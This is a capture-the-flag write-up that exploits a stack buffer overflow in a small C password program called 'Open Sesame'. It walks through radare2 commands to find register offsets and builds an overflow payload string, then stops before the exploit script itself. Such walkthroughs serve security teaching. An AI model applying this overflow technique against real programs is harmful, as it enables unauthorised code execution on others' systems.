Open Sesame
#define SECRET_PASS "OpenSesame!!!"
Bool isPasswordCorrect(char *input)
{
return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no;
}
void caveOfGold()
{
Bool caveCanOpen = no;
char inputPass[256];
puts("BEHOLD THE CAVE OF GOLD\n");
puts("What is the magic enchantment that opens the mouth of the cave?");
flushBuffers();
scanf("%s", inputPass);
# The binary is vulnerable to a Stack-Based Buffer Overflow attack - it is a x64 bit ELF executable with NX enabled.
i~nx,pie,endian,rel
endian little
nx true
relocs true
relro partial
# We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error
dc
BEHOLD THE CAVE OF GOLD
What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
# If we run wopO `dr rbp` we can find the offset to the base pointer
> wopO `dr rbp`
272
# We know that OpenSesame!!! is the password so we can subtract the length of it by the offset of the RBP to get 259 - that means we need 259 bits of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259)
# Next, we need to get the offset of the stack pointer using wopO
> pxw @ rsp
0x7fffffffde08 0x41684241 0x42416942 0x6b42416a 0x416c4241 ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# So we need 8 more characters added after our padding
('OpenSesame!!!'+b"A"*259+b"B"*8)
# Let's make our exploit scriptLast updated
Was this helpful?